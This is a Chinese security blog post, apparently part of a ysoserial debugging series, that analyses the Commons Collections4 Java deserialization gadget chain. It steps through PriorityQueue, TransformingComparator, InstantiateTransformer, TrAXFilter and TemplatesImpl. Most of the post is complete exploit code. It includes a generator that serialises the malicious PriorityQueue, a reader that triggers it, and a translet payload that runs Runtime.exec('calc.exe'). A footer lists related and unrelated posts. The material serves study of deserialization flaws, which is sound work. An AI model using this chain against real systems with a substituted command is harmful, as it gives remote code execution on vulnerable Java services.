1.前言

这篇文章继续分析commoncollections4利用链,这篇文章是对cc2的改造,和cc3一样,cc3是对cc1的改造,cc4则是对cc2的改造,里面chained的invoke变成了instantiateTransformer,所以不用invoke反射调用方法,所以外层queue里面放的元素随意

缩减版的函数调用栈如下图所示:

2.利用链分析:

调用还是从PriorityQueue.readObject函数开始

一直到org/apache/commons/collections4/comparators/TransformingComparator.class的compare函数中将调用chainedTransformer的transform方法了

这里第一个要利用的还是ConstantTransformer,要返回TrAXfilter类

接下来第二轮将调用Traxfilter类入口参数类型为Templates的构造函数,并且实例化调用该构造函数传入templatesImpl类的实例

接下来到TraxFilter的构造函数中将调用templatesImpl.newTransformer(),就可以是实例化_bytecode中存储的类进行rce了

yso构造分析:

首先构造一个Templates类的实例,然后开始构造chianed链需要的东西,首先就是一个Constanttransformer

然后再构造chained的第二个元素就是该链相对于cc2的区别为InstantiateTransformer类

接下来将两个transformer放进chaind,并且构造外层的PriorityQueue,并将chined放入TransformingComparator,然后再将Templates放到instantiate实例的参数和参数类型中,至此

就构造结束了

手动exp构造:

exp.java

package CommonsCollections4;

import  com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;

import javassist.*;

import org.apache.commons.collections4.Transformer;

import org.apache.commons.collections4.comparators.ComparableComparator;

import org.apache.commons.collections4.comparators.TransformingComparator;

import org.apache.commons.collections4.functors.ChainedTransformer;

import org.apache.commons.collections4.functors.ConstantTransformer;

import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;

import java.io.File;

import java.io.FileOutputStream;

import java.io.IOException;

import java.io.ObjectOutputStream;

import java.lang.reflect.Field;

import java.util.PriorityQueue;

public class exp {

    public static void main(String[] args) throws IOException, CannotCompileException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException, NotFoundException {

        TemplatesImpl tmp = new TemplatesImpl();

        ClassPool pool = ClassPool.getDefault();

        pool.insertClassPath(new ClassClassPath(payload.class));

        CtClass pay_class = pool.get(payload.class.getName());

        byte[] payCode = pay_class.toBytecode();

        Class clazz;

        clazz =Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");

        //存储payload类

        Field byteCode = clazz.getDeclaredField("_bytecodes");

        byteCode.setAccessible(true);

        byteCode.set(tmp,new byte[][]{payCode});

        Field name  = clazz.getDeclaredField("_name");

        name.setAccessible(true);

        name.set(tmp,"tr1ple");

        Transformer[] trans = new Transformer[]{

                new ConstantTransformer(TrAXFilter.class),

                new InstantiateTransformer(

                        new Class[]{Templates.class},

                        new Object[]{tmp})

        };

        ChainedTransformer chian = new ChainedTransformer(trans);

        //PriorityQueue<Object> queue = new PriorityQueue(2,new TransformingComparator(chian));

        TransformingComparator transCom = new TransformingComparator(chian);

        PriorityQueue queue = new PriorityQueue(2);

        queue.add(1);

        queue.add(1);

        Field com = PriorityQueue.class.getDeclaredField("comparator");

        com.setAccessible(true);

        com.set(queue,transCom);

        //序列化

        File file;

        file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections4.ser");

        ObjectOutputStream obj_out = new ObjectOutputStream(new FileOutputStream(file));

        obj_out.writeObject(queue);

    }

}

readobj.java

package CommonsCollections4;

import java.io.*;

import java.lang.Runtime;

public class readObj {

    public static void main(String[] args) throws IOException, ClassNotFoundException {

        File file;

        file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections4.ser");

        ObjectInputStream obj = new ObjectInputStream(new FileInputStream(file));

        obj.readObject();

    }

}

payload.java

package CommonsCollections4;

import com.sun.org.apache.xalan.internal.xsltc.DOM;

import com.sun.org.apache.xalan.internal.xsltc.TransletException;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;

import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;

import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class payload extends AbstractTranslet {

    {

        try {

            Runtime.getRuntime().exec("calc.exe");

        } catch (IOException e) {

            e.printStackTrace();

        }

    }

    public payload(){

        System.out.println("tr1ple 2333");

    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }

}
												


											
java反序列化-ysoserial-调试分析总结篇(4)的更多相关文章
	

    
						
  1. java反序列化-ysoserial-调试分析总结篇(2)
		
    前言: 这篇主要分析commonCollections2,调用链如下图所示: 调用链分析: 分析环境:jdk1.8.0 反序列化的入口点为src.zip!/java/util/PriorityQueu ...
    
		
    2. 
						
  2. java反序列化-ysoserial-调试分析总结篇(6)
		
    前言: 这篇记录CommonsCollections6的调试,外层也是新的类,换成了hashset,即从hashset触发其readObject(),yso给的调用链如下图所示 利用链分析: 首先在h ...
    
		
    3. 
						
  3. java反序列化-ysoserial-调试分析总结篇(3)
		
    前言: 这篇文章主要分析commoncollections3,这条利用链如yso描述,这个与cc1类似,只是反射调用方法是用的不是invokeTransformer而用的是InstantiateTra ...
    
		
    4. 
								
  4. java反序列化-ysoserial-调试分析总结篇(5)
		
    前言: 这篇文章继续分析commonscollections5,由如下调用链可以看到此时最外层的类不是annotationinvoke,也不是priorityqueue了,变成了badattribut ...
    
		
    5. 
						
  5. java反序列化-ysoserial-调试分析总结篇(7)
		
    前言: CommonsCollections7外层也是一条新的构造链,外层由hashtable的readObject进入,这条构造链挺有意思,因为用到了hash碰撞 yso构造分析: 首先构造进行rc ...
    
		
    6. 
						
  6. java反序列化——apache-shiro复现分析
		
    本文首发于“合天智汇”公众号 作者:Fortheone 看了好久的文章才开始分析调试java的cc链,这个链算是java反序列化漏洞里的基础了.分析调试的shiro也是直接使用了cc链.首先先了解一些 ...
    
		
    7. 
						
  7. java集合源码分析几篇文章
		
    java集合源码解析https://blog.csdn.net/ns_code/article/category/2362915
    
		
    8. 
						
  8. ysoserial CommonsColletions1分析
		
    JAVA安全审计 ysoserial CommonsColletions1分析 前言: 在ysoserial工具中,并没有使用TransformedMap的来触发ChainedTransformer链 ...
    
		
    9. 
						
  9. 浅谈java反序列化工具ysoserial
		
    前言 关于java反序列化漏洞的原理分析,基本都是在分析使用Apache Commons Collections这个库,造成的反序列化问题.然而,在下载老外的ysoserial工具并仔细看看后,我发现 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. TPO3-1 Architecture
			
    Even development in architecture has been the result of major technological changes. Materials and m ...
    
			
    2. 
						
  2. raw_input|active:|continue|break|
			
    a = "please" b = "say something:" c =a+b m = 0 a = True while a: m = int(raw_inp ...
    
			
    3. 
						
  3. 2019-2020-1 20199324《Linux内核原理与分析》第六周作业
			
    第五章 系统调用的三层机制(下) 1.给MenuOS增加命令 进入Linuxkernel目录下,强制删除当前menu目录,再重新克隆一个新版本的menu 进入menu,运行make roofts脚本就 ...
    
			
    4. 
						
  4. Lamda过滤替换List元素的属性值
			
    import java.util.ArrayList;import java.util.HashMap;import java.util.Iterator;import java.util.List; ...
    
			
    5. 
						
  5. 吴裕雄--天生自然python学习笔记:python 用 Open CV通过人脸识别进行登录
			
    人脸识别登录功能的基本原理是通过对比两张图片的差异度来判断两张图片是 否是同 一人的面部 . 对比图片 差异度 的算法有很多种,本例中使用“颜色直方图” 算法来实现对人脸图像的识别. 下面为比较 im ...
    
			
    6. 
						
  6. class.forName() 和 classLoader 的区别
			
    相同点:        java中class.forName() 和 classLoader 都可用来对类进行加载 不同店:        1.class.forName()除了将类的 .class  ...
    
			
    7. 
						
  7. PAT甲级——1058 A+B in Hogwarts
			
    1058 A+B in Hogwarts If you are a fan of Harry Potter, you would know the world of magic has its own ...
    
			
    8. 
						
  8. 安装php7.2
			
    1,yum源默认的版本太低了,手动安装有一些麻烦,所以可以采用yum的方式进行安装. 2,检查当前安装的PHP包yum list installed | grep php 如果有安装的PHP包,先删除 ...
    
			
    9. 
						
  9. single-value grouping |limit grouping|cutpoint grouping|Lower class limit|Upper class limit|Class width|Class mark|rounding error or roundoff error|Histograms|Dotplots|Stem-and-Leaf
			
    2.3 Organizing Quantitative Data group quantitative data: To organize quantitative data, we first gr ...
    
			
    10. 
						
  10. conditon 实现等待/通知
			
    synchronized 与wait() 和notify() notifyAll() 方法相结合可以实现等待 通知 ReetrantLock也可以实现同样的功能 需要借助condition对象,一个l ...
    
			
    11.